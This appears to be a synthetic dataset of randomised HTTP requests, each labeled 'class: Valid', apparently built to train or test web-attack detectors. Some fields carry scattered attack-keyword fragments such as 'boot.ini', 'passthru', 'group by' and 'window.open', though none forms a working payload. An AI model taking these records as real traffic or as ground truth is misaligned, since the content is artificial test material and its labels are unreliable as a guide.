Expires: Thu, 08 Jun 06 15:39:29 UTC
Last-Modified: Fri, 23 Mar 07 12:50:50 UTC
Host: 210.110.93.11
Connection: ttpq
Accept: */*;q=0.9
Accept-Charset: koi8, ks_c_5601-1987;q=0.7
Accept-Encoding: gzip;q=0.0, compress, deflate, deflate;q=0.3, deflate;q=0.2
Accept-Language: ioddo-ien;q=0.5, kahmzttf-vthe;q=0.3, a-oaei;q=0.6
Cache-Control: max-stale
Client-ip: 93.214.113.117
Cookie: wl3be=bsa8
Cookie2: $Version="4"
Date: Fri, 22 Jul 05 19:35:49 GMT
ETag: ".oy3ztPttRsopXfr"
Expect: cem1A=eeePl
From: nx7o@olnt1.uk
If-Modified-Since: Wed, 21 Jan 04 06:27:39 GMT
If-Unmodified-Since: Fri, 03 Nov 06 19:36:38 GMT
If-Match: "49T.xcQaDg1WD8DW"
If-None-Match: "Xg6_vV.naTWmRFS-QY"
If-Range: "OQ6P9lkGBrFtIifS6kA"
Max-Forwards: 8
MIME-Version: 7.9
Pragma: m='beze60sf'
Proxy-Authorization: NTLM bndlMWV3ZWplbnJlTXdpc2llZlNkVEl6OXR0dG5lbm5lbjJTOQ==
Authorization: NTLM MW9vdHRUZGRsdXR0bWRwbzBlYW1Tc3I4NnJyYXV0MHRhY2pyZXQ3YW5uT3pod24z
Range: -8172
Referer: /8ldcc.png
TE: gzip,deflate;q=0.0,chunked
Trailer: If-None-Match
User-Agent: oXQy4.8-h http://www.aba0ye.de
UA-CPU: MIPS
UA-Disp: 4017,6215,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 065x199
Via: 8.6 164.234.47.82, 1.8 70.31.33.98, 8.9 34.21.158.252:767
Transfer-Encoding: gzip
Upgrade: oolip/0.3, ahu8/5.0, 3gs/3.9, bivgut/4.8
Warning: 447 135.204.97.7 "asror" 
X-Forwarded-For: 192.154.138.206
X-Serial-Number: 527443957
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

3bmyadsa=4Ht4UQeG&tdtcnroyeesjo9s=ds+ebodylurto&eLZqb=uiz67onph&enlseptie8=Ztags8E3&i3c6chsaeat=ob tgetnsetto&li_5q8Q95DP9=nc5VwZw&MhMP4KG=31&et8dnedea=ep&wSpassthru6FKn4o2=wwwe&ns6yzsqbe1e=854247&EaqdcnAnno=0056554610&nmcrhett=er&ba2rntfispv3A=1162134&nwN8mtU0i=i'&&anic0Erlap1iA3=27802653

End - Id: 7497
Start - Id: 3170
class: Valid
GET /CYacceptHt/09fNaUne7b6iat4/i.YekWXqri/eo7/khndqhelwinbz727suL.jpg?fHMn=6980523527&eu=235&sTveeloeotn=%28servicesdahem%24sBsne%3FHh&dpuaescTprh=i+r%3Ba%24sfe%3Ba+a+&oEntfooecz1nnra=dNie%3B&prtE=tchildhnnmformlAd%5Dlocation+ewa%25E+P HTTP/1.1
Host: 239.214.242.86:050
Connection: irtoh9
Accept: text/*, application/zip
Accept-Charset: iso-8859-7, koi8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=8345
Client-ip: 71.148.219.49
Cookie: -hp_9l=LtiframeR;1ibM=oN2s@_ngKJqg
Cookie2: $Version="3"
Date: Wed, 24 May 06 10:36:41 CET
ETag: "gqOlDX9iS5x2S-ozj"
Expect: rizecjif
From: esjrw@sdiElnyr.fr
If-Modified-Since: Fri, 24 Feb 06 16:11:41 GMT
If-Unmodified-Since: Sat, 17 Sep 05 22:51:43 GMT
If-Match: *
If-None-Match: *
If-Range: "lfO3VpS7BISXG32L"
Max-Forwards: 482
MIME-Version: 4.9
Pragma: ist9=yioteseg
Proxy-Authorization: Basic OHRyZTpUZWttd3N0ZQ==
Authorization: NTLM bUF0dW90aWk4bmV1c2Vjc29hbnJNbGFUYXJ0bHRsZXVhaGdkbw==
Range: -47302,-8,36738-
Referer: http://rshimnd.st/BXaeao/tEsRcti.js
TE: trailers,gzip
Trailer: Authorization
User-Agent: rm7psVV http://www.oto9.biz
UA-CPU: PowerPC
UA-Disp: 0688,984,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 766x405
Via: FTP/4.7 97.139.182.120
Transfer-Encoding: compress
Upgrade: ianerr/8.5
Warning: 132 www.nTshc.jpg "Fieyiaatdeh" 
X-Forwarded-For: 155.35.91.21
X-Serial-Number: 37153368506514
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3170
Start - Id: 4474
class: Valid
POST /tjntnt5ch4el/enz4RvgWuUNGzF/sy_h7F8NUZp85.png? HTTP/1.1
Content-Length: 187
Content-Language: n
Content-Encoding: deflate
Content-Location: /azo2xlA.cfm
Content-MD5: d2xlaWdydGVzZWdvb2VkYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 23 Sep 07 21:50:15 CET
Last-Modified: Sat, 13 Sep 08 13:23:22 CET
Host: www.emi7dhtNt5.com:14962
Connection: keep-alive
Accept: video/*, video/*;q=0.3
Accept-Charset: ks_c_5601-1987, gb2312, iso-2022-kr;q=0.0, isiri-3342;q=0.1, iso-8859-5;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: wttfo-tiO;q=0.3, O6n4lc-rtsru9wn, l1ae4en-acerBnrs;q=0.3
Cache-Control: only-if-cached
Client-ip: 157.6.94.128
Cookie: cgsnno=245904959;ssi=60748660;hoFyt=0268647;oien=018178
Cookie2: $Version="24"
Date: Fri, 26 Jan 07 06:14:40 UTC
ETag: "T1Np.U00Gp9bgT5HkM7R"
Expect: ueOiteFj=hyhs
From: eneiwbe@rqreia1soo.ch
If-Modified-Since: Tue, 16 Jan 07 07:17:20 GMT
If-Unmodified-Since: Wed, 14 Dec 05 05:14:52 GMT
If-Match: *
If-None-Match: "J7kkO7lVbhqCW2ws."
If-Range: Sun, 04 Jan 09 04:30:42 UTC
Max-Forwards: 32
MIME-Version: 8.8
Pragma: nsDx6='dtautjn'
Proxy-Authorization: Basic aW5qdnVwdXI6bzFTcHB6TQ==
Authorization: icrn t3Hrdn4=Mgisxha
Range: 47-43864,-075,-7838
Referer: /athnobz/rooRr.mdb
TE: trailers,deflate
Trailer: Accept
User-Agent: Mozilla/0.5 (Windows; U; Windows NT 9.9; Ed-o4; rv:3.6.2) Gecko/65764443
UA-CPU: StrongARM
UA-Disp: 9080,142,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 421x3151
Via: 0.6 www.isenSimd.jpeg, FTP/0.8 www.1sete.tiff, 4.4 www.entsa.gif
Transfer-Encoding: compress
Upgrade: Ncnd/9.0, sne/9.0, e0cb/3.5, la4/2.0, sjR/3.7
Warning: 512 233.21.168.235 "8w0fheinetpez" "Sun, 23 Jan 05 24:46:33 GMT"
X-Forwarded-For: 190.181.24.9
X-Serial-Number: 944553276
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sonm3y=sr4porsntnsystemmri99&okstlysexoy=;&ScA7heo4keinet=430598779&jiqo4wsat=0128&otdumse=22&7wxen=viTofaeiiptx&0T@R8Nxtermr=o3Dx7tn9o&S6ze1aj=amwpOktrclTp&Tsmqrg6d=49stc&o79rthh=acmna

End - Id: 4474
Start - Id: 25148
class: Valid
GET /ya8sdtua8cferj.pl?aKomh=ondmnfabeolwto&et=zwp-tg HTTP/1.0
Host: 129.94.41.57
Connection: uuoorisi
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: huTtnioe-o31ubi, vyoSf-i;q=0.0, baa-etv, deelipee-mridieia
Cache-Control: min-fresh=448
Client-ip: 32.228.225.57
Cookie: rwinntKFZwindow.open=ne&noscat4d ;i3lcb=ehm;titm6Hde4ca=%sdci;6aabtTd=iem;LlAsootN=ans;ymetaGrtAttelnetrhttps=106347108
Cookie2: $Version="9"
Date: Mon, 26 Nov 07 22:45:14 UTC
ETag: W/"Ve.@D6zZ4Y6MV36UG"
Expect: peup
From: eMfiaeeO@ftisitrql.fr
If-Modified-Since: Thu, 08 Mar 07 12:44:26 CET
If-Unmodified-Since: Wed, 08 Apr 09 21:52:45 CET
If-Match: "7WwGEXxOV3QKhSO9AGGK"
If-None-Match: *
If-Range: "vnbUe0TUxaTQLzc5"
Max-Forwards: 0172
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM b3JkdHBhMWFvaGVsYXRFZWUzMG9pajlpc25vaTl0YW5udW4=
Authorization: Digest realm
Range: -5
Referer: /aosd/pjaynsem/Gwgy.asmx
TE: gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: liepn9lh (ibRuNkPUl)
UA-CPU: Sparc
UA-Disp: 037,012,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5457x802
Via: FTP/8.0 50.71.7.109, FTP/3.2 www.cmtede.html
Transfer-Encoding: deflate
Upgrade: oulp3p/8.2
Warning: 467 www.tgndum.png:11059 "pnnhlneoaxd" 
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 3897200999
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25148
Start - Id: 20744
class: Valid
GET /bsaobdf/aS_HPualP_/MunionT/znadfthd/bCyBUusrLfdeleteA5connectB/3OmdKjh/swSs-/uaqaml/eessr/jeqeatic/eSBJ8LnZGNN4qcogRlk.cgi?remsho=eualtasnaTget6owc&nheefcoas1eatq=3813&ze6qen=calore&ey=0 HTTP/1.1
Host: 143.85.155.207:80
Connection: close
Accept: text/plain;q=0.7, image/*
Accept-Charset: *
Accept-Encoding: compress;q=0.7, compress;q=0.6, compress, deflate, compress;q=0.7
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 77.195.156.216
Cookie: ufao=764
Cookie2: $Version="66"
Date: Wed, 26 Oct 05 06:37:45 CET
ETag: "iULSH0MTv32oEVX"
Expect: sbcoa
From: edarepsn@mOihgon.org
If-Modified-Since: Thu, 03 Nov 05 01:56:22 UTC
If-Unmodified-Since: Sun, 29 Mar 09 06:35:06 GMT
If-Match: "RpFvRhLV9J@ix1O7"
If-None-Match: *
If-Range: "1mgHRV4rzR8KRpBIMxOi"
Max-Forwards: 818
MIME-Version: 0.4
Pragma: Gudtc2n=p4
Proxy-Authorization: Basic c2xmdnI3cjpkaGZudGFr
Authorization: Basic dHQ1bnc6MXZmbWFocmg=
Range: 802086-,4327-
Referer: /Ute3/eiondohS/aeAfnval.doc
TE: gzip;q=0.9,gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.7 (X11; U; Open BSD i386 0.1; 1n-ok; rv:6.6.5) Gecko/60819317
UA-CPU: MIPS
UA-Disp: 2316,870,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2236x546
Via: 3.2 www.ydAesno.png:7925, 0.4 35.195.179.47, 3.4 www.Lcatthr.png:10449
Transfer-Encoding: identity
Upgrade: atj/9.2
Warning: 048 www.t5Tt.htm "do6lPmneullbrd" 
X-Forwarded-For: 148.116.239.129
X-Serial-Number: 43053635016402500046
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20744
Start - Id: 14716
class: Valid
GET /IA_YqmC5qdg0.asp? HTTP/1.0
Host: www.6Tdytr.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.5, compress;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 53.111.94.29
Cookie: uEuhmonvte=9637110;qhAM1YklibGX-=it(hni6tnpositiongroup by;ctub3i1viy=eh6es;_nNXqQH=p1vGF;snurthiir6i= |se~ns8;Eeboot.iniali;il=cAT6NyvLWC_.
Cookie2: $Version="6"
Date: Mon, 26 Nov 07 03:29:11 GMT
ETag: W/"CjXd5ytRG8C2ENF8MV"
Expect: oiheoS=SOre;era8=iynroe
From: zar3wadE@0eyihva.cz
If-Modified-Since: Thu, 24 Feb 05 19:50:01 GMT
If-Unmodified-Since: Wed, 27 Dec 06 10:21:04 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 21 Nov 05 18:07:23 CET
Max-Forwards: 09
MIME-Version: 3.2
Pragma: vdaynbl='epjsyw'
Proxy-Authorization: Digest uri=http://tett.ch/tulLjgt.swf
Authorization: Basic aXRkbXRyVW86QVRsc3I=
Range: 07-
Referer: http://cclt.fr/bswcmzoi/eyoeao/wheDg.jsp
TE: chunked,trailers
Trailer: Pragma
User-Agent: Mozilla/4.2 (X11; U; Solaris 0.8; ir-th; rv:3.3.3) Gecko/91386103
UA-CPU: x86
UA-Disp: 733,9202,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0368x227
Via: HTTP/2.0 168.255.1.26, HTTP/9.9 www.mtcaaza.htm, 7.0 www.p8lh9n.shtml
Transfer-Encoding: gzip
Upgrade: isiavm/4.5, oOb/6.3
Warning: 558 www.ronb.png:85114 "eteaQlei6Imtxieuee" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14716
Start - Id: 32864
class: Valid
PUT /efhsSnsf0aBb.asp? HTTP/1.1
Content-Length: 42
Content-Language: te4i,fyz
Content-Encoding: compress
Content-Location: /auomBwo/anhatlh/ulLca/aboee1.htm
Content-MD5: YjNzb0VsNWR0c3JyZWdnQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Apr 08 06:39:35 UTC
Last-Modified: Wed, 14 Apr 04 02:49:50 CET
Host: 234.150.138.211
Connection: ovmpeOi
Accept: image/*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: ooee7mH-a2eeth;q=0.0, 9n-4siOoc
Cache-Control: no-cache
Client-ip: 50.137.205.249
Cookie: rim=s42swc;tcL1msay3=3891;Doemr=skh
Cookie2: $Version="37"
Date: Wed, 05 Nov 08 02:42:11 UTC
ETag: W/"Awk6qeuwMq_gg-3SJY7w"
Expect: 100-continue
From: taoanoi@ags2rpme.org
If-Modified-Since: Wed, 10 Feb 10 04:52:23 UTC
If-Unmodified-Since: Wed, 10 Sep 08 20:11:52 UTC
If-Match: "fLdDoXzzhXiyQQ4PQ"
If-None-Match: "yV.W5dr6y9UL6_nA"
If-Range: Tue, 22 May 07 21:37:56 CET
Max-Forwards: 779
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: 4Ws6te dne4t49h=yetlt8fh
Authorization: Digest realm
Range: 210-26,-43,957-
Referer: /thoa4yd.php4
TE: chunked;q=0.1,gzip;q=0.3,deflate;q=0.5
Trailer: Warning
User-Agent: ehetnd6oqtdt
UA-CPU: PowerPC
UA-Disp: 523,5412,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 386x304
Via: 1.3 255.140.207.184, 7.7 214.40.116.43, az6sid/8.0 185.234.90.197
Transfer-Encoding: gzip
Upgrade: at3hnI/7.0, 3eo4/8.2, banehg/6.2, Ag8hoA/1.7, seT/3.4
Warning: 299 174.29.128.72 "setBezidiuloeuepNe" "Fri, 02 Jul 04 12:55:39 GMT"
X-Forwarded-For: 222.194.36.22
X-Serial-Number: 844313941
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tic=lthha&bieu7eab2=bR.-DfZjZ&iktuiss=3?

End - Id: 32864
Start - Id: 1688
class: Valid
GET /atyraecehfdi/EOvpheRpcatDv58/nodeBeT3rnph-/ootviyeete/pu-ZY3sAP/iIRNkvTlaw/tr7.html?tjeAfnh=oEiei9&ihao8airsNdxteo=9erxr7Ieoth%3F&tSrunOkNuaicl=7066013033&etOcjlaseo=oltswyvrid0s9T&k35@uUlikeFO=651468&9gereOrNs=ni&IdN8m5mj=lwrTs%7Eltdk&toSuojwkebdee=hFh&cmnmhetwarleame=30817030&1g=agv.WR2&csequatioeia=5haAf&em=1ellogmk%3Bozea&du2=snht HTTP/1.1
Host: www.rra0Ja.org
Connection: keep-alive
Accept: video/*;q=0.8, audio/x-wav;q=0.3, image/*;q=0.2
Accept-Charset: us-ascii, x-mac-arabic, macintosh;q=0.3, utf-7, x-mac-hebrew;q=0.8
Accept-Encoding: *
Accept-Language: tesrha-i;q=0.8
Cache-Control: max-age=0224
Client-ip: 113.227.171.154
Cookie: czypwT7B1U=3005;itTUcmehyslh=xouQbM-bet2Y;_KYsamd2=rc9e
Cookie2: $Version="033"
Date: Mon, 23 May 05 22:19:15 GMT
ETag: W/"Guq8N-HdhkeH6XJ1-_"
Expect: oeontso=mhebs;aosd=0gc1px
From: iNaNl@nioce.ch
If-Modified-Since: Tue, 30 Dec 08 03:22:16 GMT
If-Unmodified-Since: Fri, 17 Jun 05 11:37:22 GMT
If-Match: *
If-None-Match: *
If-Range: "IdV5sc94uZuONlReQe"
Max-Forwards: 0
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest username="o3aarj"
Authorization: mt4rn e5uawb=hagna
Range: 73-
Referer: /swnxer.nsf
TE: trailers,trailers
Trailer: Expect
User-Agent: IoNdaNtte
UA-CPU: StrongARM
UA-Disp: 5510,109,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3865x207
Via: FTP/1.4 13.27.43.58, 1.1 78.92.97.26
Transfer-Encoding: identity
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 300 92.186.4.96 "i1U7e" "Sat, 28 Feb 04 05:11:20 CET"
X-Forwarded-For: 64.253.35.40
X-Serial-Number: 3355979393710804862
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1688
Start - Id: 26131
class: Valid
GET /tnn/parerzI/CnG_/secoey/h.kzo/hvlsbotnttentd/o2wSrT8bV4/qTksj6um/vcI2bzdNPG5hR/l80Np2cqeMuazJ0V4/q9document9qhnC7/ijvLuC.css?aqixakmh=8408707368&ijnfoei1=tJcw&bwTbf=0&grkditbh5seio=6C&tteeuhGscdns7=618123&gdStemrUe=17dnAdarpiNswmotrh&emgnliiraa=0tprocessing-instructiono%40zoauOma&qigR5=yWx&Y-s2D9=wntveprOetc&vaY82=217719&AiOu=b%40huR&ltPA=12469263&PM3replaceSbIuz=hNPx&w-rQ.evalmXI@Mv=ra4.VQ_L&itaeht7wEs=tgTnk-1GZ9 HTTP/1.0
Host: 3.204.190.174
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 201.34.209.213
Cookie: nl=N?hj;yyttiSi=erennuzieoetr9e;eht3vserLddtioo=inagosett
Cookie2: $Version="23"
Date: Tue, 09 Oct 07 20:38:49 CET
ETag: W/"ZYw7JRc.kCOTo_1"
Expect: oantTa=i2iwtls;biarhnn
From: xeno@faL1.st
If-Modified-Since: Tue, 10 Jul 07 10:35:46 GMT
If-Unmodified-Since: Thu, 20 Jul 06 17:31:02 CET
If-Match: *
If-None-Match: "QA6lFv-ZvwWc2JZs"
If-Range: Tue, 17 Nov 09 21:56:37 UTC
Max-Forwards: 620
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM ZXN0MmVvbjBzdGlhbGwxbWNvQTUybmVsSWVlNWx0ZWllZWlWYWFsbnNicG8=
Authorization: Digest username="omei"
Range: -076,520453-4710
Referer: http://onsEerm.net/asiHglu/k0ne/oilS0/4bKtL.php4
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/9.9 (compatible; MSIE 3.2; Win98; e6irnn; 5irThn)
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 886x233
Via: 4.9 www.qpiawasO.htm:4644, 0.8 245.53.218.221
Transfer-Encoding: identity
Upgrade: gefl/7.1, lhm/3.4, crto/0.1, lwu/3.1
Warning: 803 211.131.116.100 "tisise5eslK" "Tue, 29 Dec 09 16:59:21 UTC"
X-Forwarded-For: 38.148.116.46
X-Serial-Number: 6736217
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26131
Start - Id: 5007
class: Valid
PUT /e9ripmOLW8GXbe/5sc1uon4/y5dcwstz/tq8p8JII.cgi? HTTP/1.1
Content-Length: 127
Content-Language: I,s
Content-Encoding: deflate
Content-Location: http://www.aiwzt2.org/GaIw/nntohmmp/otayet.js
Content-MD5: aWF0dGN1cm5lZWhvYWJhYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Nov 08 21:15:07 GMT
Last-Modified: Tue, 17 Nov 09 07:36:23 UTC
Host: 56.51.12.219
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i-h;q=0.1
Cache-Control: min-fresh=447
Client-ip: 111.197.53.14
Cookie: oymru=enRnl;1LDD6=eN6mKVBhZQP
Cookie2: $Version="361"
Date: Wed, 29 Apr 09 03:58:13 UTC
ETag: W/"RxD8upuX4WwDQOW"
Expect: 100-continue
From: anypee@kdrqiteI.it
If-Modified-Since: Mon, 01 Aug 05 07:16:30 UTC
If-Unmodified-Since: Sun, 16 Aug 09 09:06:49 GMT
If-Match: *
If-None-Match: "Mnw6LoxyI@tyrp8-VL_"
If-Range: "zcIcX_IlwzoJZN@-Ou@"
Max-Forwards: 8
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic a2xtaTpxVGlz
Range: -10
Referer: /terdn/tFgui/enoorqg.avi
TE: trailers,chunked
Trailer: Accept-Language
User-Agent: g6nNIetemr (e_1HSK)
UA-CPU: 68000
UA-Disp: 770,4092,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5947x3710
Via: 3.9 www.dSsi.jpeg:807, 0.4 57.250.88.49, tIu5/7.6 www.mdra.jpg:52
Transfer-Encoding: compress
Upgrade: lda1/1.1, roi/5.3, aodtys/7.9
Warning: 459 www.stfkt.css:00 "enygOrouo8ussoypt" 
X-Forwarded-For: 3.243.104.229
X-Serial-Number: 03530
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

abOnP=olulinkr~2@tt&T4lcnksntaa=83&phptsloecdite=eJZHpGP1o&heludyA=et4ieens&jolroeziph1gen=e\ps&uupcnxolttzo=atooeso1d8vu

End - Id: 5007
Start - Id: 22703
class: Valid
GET /sb_y.QP.tiff?s7eare=%3B+%7Et&ngsDi51xegm=yacltdtrhoe&jdttosm=e9gPNKI&vymJb5yKHK=ie&ol=06&d2aheWs4oNb=324&mL7ZoptWboot.ini6=gctselect&CgX8NQLY2g=lnce63l4askoid3rsv&nwVB=liten3itari&atzdsoEloAiiab=7567 HTTP/1.1
Host: www.lchy.gov:80
Connection: eho0
Accept: video/quicktime, application/*
Accept-Charset: iso-8859-8;q=0.4, cp-932, euc-kr, iso-8859-5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 24.173.40.220
Cookie: zpO=nhr;ee5dlacifeeitu=elqeA<avbscriptotmo Masri
Cookie2: $Version="46"
Date: Thu, 10 Dec 09 05:35:28 GMT
ETag: W/"XUHbUD3CedbGOUJ@"
Expect: vaNced
From: ohhR@ti5t.uk
If-Modified-Since: Mon, 16 Jun 08 24:14:13 GMT
If-Unmodified-Since: Sun, 04 Jan 04 04:55:02 CET
If-Match: *
If-None-Match: *
If-Range: "SOTnn-HjMXzkJN3WFS0S"
Max-Forwards: 0011
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic OXVueWFkbjo1bmxlRW50Zw==
Range: -0811
Referer: http://www.yesj.ch/rrlolA/ia2t/ewmri7t/7utd9da/qmnmt.pdf
TE: chunked,trailers
Trailer: Connection
User-Agent: ntkT/8.5.8.8.3
UA-CPU: x86
UA-Disp: 949,175,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0084x738
Via: 0.6 www.Tihej.html, 2.6 www.cetbtbh.htm
Transfer-Encoding: ndfcs
Upgrade: npstdo/2.1, Bagih/0.7, ysdS/4.0, iMl/4.5
Warning: 346 224.131.21.168 "uaifemiio3r" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 12701556330524195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22703
Start - Id: 22456
class: Valid
GET /2Ustyle0ZLIelYXp./iVyeEm/ihlyLugtlnf/feIrMddSin/wbIlWnTkhJd_aiIE4-w/n4Oz5s0T/aD3v1deeL7d/iEmtosfgtsroU4NtnOst.html?00arjratgrttee=2&joAf0ta=iwindow.openohs&Rtairiil=d%27teinyoeFy&RAq_hM@ANVQn=9&LsnttDa=ysesrrsgWmoc7&oeAhvqdyt=9353&rdHmtIrm=rohs6tuasnrf5&tnaovr7=HIdbsAyeetc8y&senaO=a%29%3Ar&e4=auh&ItI0Q3XgXkps1=281&9Wtcncidaf1Lgd=tp7TlhWhy&uig0oteeXeiF1c=cwme HTTP/1.0
Host: 170.141.228.47
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, deflate, deflate;q=0.9, compress, deflate;q=0.6
Accept-Language: r-Aegbrie;q=0.2, tISNrbt-Eejd3tt;q=0.0, Hsf6uutp-npZTbt
Cache-Control: no-store
Client-ip: 242.133.189.214
Cookie: vm9n9u9jyk=pa4ss
Cookie2: $Version="83"
Date: Wed, 29 Dec 04 06:04:32 UTC
ETag: "AJc5@Q-ttgbYBgDcFX"
Expect: 100-continue
From: ihv7ae@aqtd1l3.cz
If-Modified-Since: Sat, 18 Oct 08 07:14:06 CET
If-Unmodified-Since: Tue, 10 Jun 08 01:42:42 GMT
If-Match: *
If-None-Match: "RnyIWLM5RL3PdGRVr"
If-Range: Sat, 14 Jun 08 11:10:25 GMT
Max-Forwards: 3033
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic dGdyZXpHaDpjYmRlNWFpbg==
Authorization: Digest opaque="Daidggoj"
Range: 457992-,02-
Referer: http://aiFlaa.gov/gltnmh.mpeg
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: 0tsrEsdeda/1.2.7
UA-CPU: MIPS
UA-Disp: 4335,2091,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 112x1566
Via: 7.2 221.99.43.73, 6.4 73.81.80.51, 8.6 www.te4ei.js:53493
Transfer-Encoding: compress
Upgrade: plrEu/0.9, 0onans/5.6, irA/4.2
Warning: 775 242.150.48.252:01439 "edbeecvdNatlhToaah" "Thu, 14 Jul 05 23:57:30 CET"
X-Forwarded-For: 14.86.146.83
X-Serial-Number: 5826747890581
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22456
Start - Id: 33291
class: Valid
POST /HjQRqBL1F6uJscript/euGocm9loseabmkf/nDPk4Ogf/oMZeUMhJqFThzFPkpP/e9eoont7urs1oymtRl/aon4nO4.php3? HTTP/1.0
Content-Length: 79
Content-Language: qttbhex,2habtgr
Content-Encoding: deflate
Content-Location: http://onmsot.uk/aaefsBL/lwev.mpeg
Content-MD5: b29lbjlubm1rRWxVT29hTA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Dec 07 12:35:13 CET
Last-Modified: Sat, 08 Dec 07 01:41:42 GMT
Host: www.outte.be
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp, windows-1251;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: loez='chZln8'
Client-ip: 229.124.95.212
Cookie: NEscX2=83;l7ZzwDfM=98155;1e=sRdaphpodhp;SBL2s=3edlo9z;thgFi=9738300172
Cookie2: $Version="4"
Date: Sat, 12 Jul 08 06:52:06 CET
ETag: "Xe2rEz2vPptDIu.1ip"
Expect: 100-continue
From: fotmtnu@a26intx.net
If-Modified-Since: Sun, 09 Jan 05 04:13:13 UTC
If-Unmodified-Since: Sat, 13 Mar 10 12:43:29 GMT
If-Match: *
If-None-Match: "pPW-So09@iOJuYl.uiL"
If-Range: Thu, 04 Mar 10 18:26:46 UTC
Max-Forwards: 21
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM cGJEdTNlbWVhbW1kYWVhOW5zdGdndGwzSG85ZXlzY2d4bQ==
Range: 8584-634
Referer: /RNRifIbr.msf
TE: chunked;q=0.0,trailers
Trailer: Accept-Language
User-Agent: d2ktB_DB http://www.eOej.biz
UA-CPU: MIPS
UA-Disp: 088,074,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8624x050
Via: 4.6 96.42.169.238, FTP/9.6 www.pAwlRms.png
Transfer-Encoding: compress
Upgrade: olEewx/5.1
Warning: 216 98.195.83.109 "myymAJnoiocc" 
X-Forwarded-For: 25.177.72.70
X-Serial-Number: 411007
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eited2eat=shdrsOhioeiMeiaeo&aar7citbeotSdo3=7bGgtr&7reab=slsodrop1&RB2wSrU=5aga

End - Id: 33291
Start - Id: 25932
class: Valid
GET /ejcbJr_/hiwlqNqyP/x16/c@CZNfOfMQ/dVu8Qr/n6PTD.js?5nKUqj=cCssndeipfletp&rdenttioa=92291374&3Qpdivg.=837&pr=ipAz6VTb&aqtn78ms=til&itci=39&rv8p1Qmail=8JjrfkPT&snehvr=ezrmrnmmtigoh&ehrontbIijetcu=98000640&y8e=-iDa%27&Onguqbpis=n3tFC84D&ee6h8eCey=emlsadooe&lEt7e=tnsIct0n6ticwol&tInsAovtcdHwaon=ImocTee&e1Vle2mr5=te4h HTTP/1.1
Host: 122.28.40.137
Connection: yblen
Accept: */*
